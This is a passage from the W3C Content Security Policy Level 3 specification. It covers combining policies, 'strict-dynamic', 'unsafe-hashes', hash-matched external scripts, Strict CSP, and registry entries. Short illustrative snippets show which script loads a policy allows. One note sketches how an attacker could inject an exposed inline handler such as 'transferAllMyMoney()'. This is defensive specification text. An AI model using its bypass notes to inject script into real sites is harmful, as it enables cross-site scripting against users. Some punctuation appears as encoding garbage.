Is a connection to example.com allowed or not? The short answer is that the
connection is not allowed. Enforcing both policies means that a potential
connection would have to pass through both unscathed. Even though the second
policy would allow this connection, the first policy contains connect-src 'none'
, so its enforcement blocks the connection. The
impact is that adding additional policies to the list of policies to enforce
can only further restrict the capabilities of the protected resource.
To demonstrate that further, consider a script tag on this page. The first
policy would lock scripts down to 'self'
, http://example.com
and http://example.net
via the default-src
directive. The second, however,
would only allow script from http://example.com/
. Script will only load if
it meets both policyās criteria: in this case, the only origin that can match
is http://example.com
, as both policies allow it.
8.2. Usage of "'strict-dynamic'
Host- and path-based policies are tough to get right, especially on sprawling origins like CDNs. The solutions to Cure53ās H5SC Minichallenge 3: "Sh*t, itās CSP!" [H5SC3] are good examples of the kinds of bypasses which such policies can enable, and though CSP is capable of mitigating these bypasses via exhaustive declaration of specific resources, those lists end up being brittle, awkward, and difficult to implement and maintain.
The "'strict-dynamic'
" source expression aims to make Content
Security Policy simpler to deploy for existing applications who have a high
degree of confidence in the scripts they load directly, but low confidence in
their ability to provide a reasonable list of resources to load up front.
If present in a script-src
or default-src
directive, it has
two main effects:
host-source and scheme-source expressions, as well as the "
" and "'self'
keyword-sources will be ignored when loading script.hash-source and nonce-source expressions will be honored.
Script requests which are triggered by non-"parser-inserted"
elements are allowed.
The first change allows you to deploy "'strict-dynamic'
" in a
backwards compatible way, without requiring user-agent sniffing: the policy 'unsafe-inline' https: 'nonce-abcdefg' 'strict-dynamic'
will act like 'unsafe-inline' https:
in browsers that support CSP1, https: 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV'
in browsers that support CSP2, and 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV' 'strict-dynamic'
in browsers that
support CSP3.
The second allows scripts which are given access to the page via nonces or hashes to bring in their dependencies without adding them explicitly to the pageās policy.
Content-Security-Policy: script-src 'nonce-DhcnhD3khTMePgXwdayK9BsMqXjhguVV' 'strict-dynamic'
And serves the following HTML with that policy active:
...< script src = "https://cdn.example.com/script.js" nonce = "DhcnhD3khTMePgXwdayK9BsMqXjhguVV" ></ script > ...
This will generate a request for https://cdn.example.com/script.js
, which
will not be blocked because of the matching nonce
If script.js
contains the following code:
var s= document. createElement( 'script' ); s. src= 'https://othercdn.not-example.net/dependency.js' ; document. head. appendChild( s); document. write( '<scr' + 'ipt src="/sadness.js"></scr' + 'ipt>' );
will load, as the script
element created by createElement()
is not "parser-inserted".
will not load, however, as document.write()
produces script
elements which are "parser-inserted".
Note: With 'strict-dynamic', scripts created at runtime will be allowed to execute. If the location of such a script can be controlled by an attacker, the policy will then allow the loading of arbitrary scripts. Developers that use 'strict-dynamic' in their policy should audit the uses of non-parser-inserted APIs and ensure that they are not invoked with potentially untrusted data. This includes applications or frameworks that tend to determine script locations at runtime.
8.3. Usage of "'unsafe-hashes'
This section is not normative.
Legacy websites and websites with legacy dependencies might find it difficult
to entirely externalize event handlers. These sites could enable such handlers
by allowing 'unsafe-inline'
, but thatās a big hammer with a lot of
associated risk (and cannot be used in conjunction with nonces or hashes).
The "'unsafe-hashes'
" source expression aims to make
CSP deployment simpler and safer in these situations by allowing developers
to enable specific handlers via hashes.
< button id = "action" onclick = "doSubmit()" >
Rather than reducing security by specifying "'unsafe-inline'
", they decide to use
" along with a hash source expression corresponding to doSubmit()
, as follows:
Content-Security-Policy: script-src 'unsafe-hashes' 'sha256-jzgBGA4UWFFmpOBq0JpdsySukE1FrEN5bUpoK8Z29fY='
The capabilities 'unsafe-hashes'
provides is useful for legacy sites, but should be
avoided for modern sites. In particular, note that hashes allow a particular script to execute,
but do not ensure that it executes in the way a developer intends. If an interesting capability
is exposed as an inline event handler (say <a onclick="transferAllMyMoney()">Transfer</a>
then that script becomes available for an attacker to inject as <script>transferAllMyMoney()</script>
. Developers should be careful to balance the risk of
allowing specific scripts to execute against the deployment advantages that allowing inline
event handlers might provide.
8.4. Allowing external JavaScript via hashes
In [CSP2], hash source expressions could only match inlined script, but now that Subresource Integrity [SRI] is widely deployed, we can expand the scope to enable externalized JavaScript as well.
If multiple sets of integrity metadata are specified for a script
, the
request will match a policyās hash-sources if and only if each item in a script
's integrity metadata matches the policy.
Note: The CSP spec specifies that the contents of an inline script
or event handler needs to be encoded using UTF-8 encode before computing
its hash. [SRI] computes the hash on the raw resource that is being
fetched instead. This means that it is possible for the hash needed to allow
an inline script block to be different that the hash needed to allow an
external script even if they have identical contents.
Content-Security-Policy: script-src 'sha256-abc123' 'sha512-321cba'
In the presence of that policy, the following script
elements would be
allowed to execute because they contain only integrity metadata that matches
the policy:
< script integrity = "sha256-abc123" ...></ script > < script integrity = "sha512-321cba" ...></ script > < script integrity = "sha256-abc123 sha512-321cba" ...></ script >
While the following script
elements would not execute because they
contain valid metadata that does not match the policy (even though other
metadata does match):
< script integrity = " sha384-xyz789 " ...></ script > < script integrity = " sha384-xyz789 sha512-321cba" ...></ script > < script integrity = "sha256-abc123 sha384-xyz789 sha512-321cba" ...></ script >
Metadata that is not recognized (either because itās entirely invalid, or because it specifies a not-yet-supported hashing algorithm) does not affect the behavior described here. That is, the following elements would be allowed to execute in the presence of the above policy, as the additional metadata is invalid and therefore wouldnāt allow a script whose content wasnāt listed explicitly in the policy to execute:
< script integrity = "sha256-abc123 sha1024-abcd " ...></ script > < script integrity = "sha512-321cba entirely-invalid " ...></ script > < script integrity = "sha256-abc123 not-a-hash-at-all sha512-321cba" ...></ script >
8.5. Strict CSP
Deployment of an effective CSP against XSS is a challenge (as described in CSP Is Dead, Long Live CSP! [LONG-LIVE-CSP]). However, enforcing the following set of CSP directives has been identified as an effective and deployable mitigation against XSS.
script-src: Only use nonce source-expression and/or hash source-expression with the "'strict-dynamic'" keyword-source.
Note: While "'strict-dynamic'" allows ease of deployment (as described in Ā§āÆ8.2 Usage of "'strict-dynamic'"), it should be avoided when possible.
Note: For backwards compatibility, it is recommended to specify https: scheme-source with "'strict-dynamic'".
A CSP that meets the above criteria is called Strict CSP. Further details are discussed in [WEBDEV-STRICTCSP].
Nonce-based Strict CSP:
Content-Security-Policy: script-src 'strict-dynamic' 'nonce-{RANDOM}'; base-uri 'self';
Hash-based Strict CSP:
Content-Security-Policy: script-src 'strict-dynamic' 'sha256-{HASHED_INLINE_SCRIPT}'; base-uri 'self';
9. Implementation Considerations
9.1. Vendor-specific Extensions and Addons
Policy enforced on a resource SHOULD NOT interfere with the operation of user-agent features like addons, extensions, or bookmarklets. These kinds of features generally advance the userās priority over page authors, as espoused in [HTML-DESIGN].
Moreover, applying CSP to these kinds of features produces a substantial amount of noise in violation reports, significantly reducing their value to developers.
Chrome, for example, excludes the chrome-extension:
scheme from CSP checks,
and does some work to ensure that extension-driven injections are allowed,
regardless of a pageās policy.
10. IANA Considerations
10.1. Directive Registry
The Content Security Policy Directive registry should be updated with the following directives and references [RFC7762]:
This document (see Ā§āÆ6.3.1 base-uri)
This document (see Ā§āÆ6.1.1 child-src)
This document (see Ā§āÆ6.1.2 connect-src)
This document (see Ā§āÆ6.1.3 default-src)
This document (see Ā§āÆ6.1.4 font-src)
This document (see Ā§āÆ6.4.1 form-action)
This document (see Ā§āÆ6.4.2 frame-ancestors)
This document (see Ā§āÆ6.1.5 frame-src)
This document (see Ā§āÆ6.1.6 img-src)
This document (see Ā§āÆ6.1.7 manifest-src)
This document (see Ā§āÆ6.1.8 media-src)
This document (see Ā§āÆ6.1.9 object-src)
This document (see Ā§āÆ6.5.1 report-uri)
This document (see Ā§āÆ6.5.2 report-to)
This document (see Ā§āÆ6.3.2 sandbox)
This document (see Ā§āÆ6.1.11 script-src)
This document (see Ā§āÆ6.1.13 script-src-attr)
This document (see Ā§āÆ6.1.12 script-src-elem)
This document (see Ā§āÆ6.1.14 style-src)
This document (see Ā§āÆ6.1.16 style-src-attr)
This document (see Ā§āÆ6.1.15 style-src-elem)
This document (see Ā§āÆ6.2.2 worker-src)
10.2. Headers
The permanent message header field registry should be updated with the following registrations: [RFC3864]
10.2.1. Content-Security-Policy
- Header field name
- Content-Security-Policy
- Applicable protocol
- http
- Status
- standard
- Author/Change controller
- W3C
- Specification document
- This specification (See Ā§āÆ3.1 The Content-Security-Policy HTTP Response Header Field)
10.2.2. Content-Security-Policy-Report-Only
- Header field name
- Content-Security-Policy-Report-Only
- Applicable protocol
- http
- Status
- standard
- Author/Change controller
- W3C
- Specification document
- This specification (See Ā§āÆ3.2 The Content-Security-Policy-Report-Only HTTP Response Header Field)
11. Acknowledgements
Lots of people are awesome. For instance:
Mario and all of Cure53.
Artur Janc, Michele Spagnuolo, Lukas Weichselbaum, Jochen Eisinger, and the rest of Googleās CSP Cabal.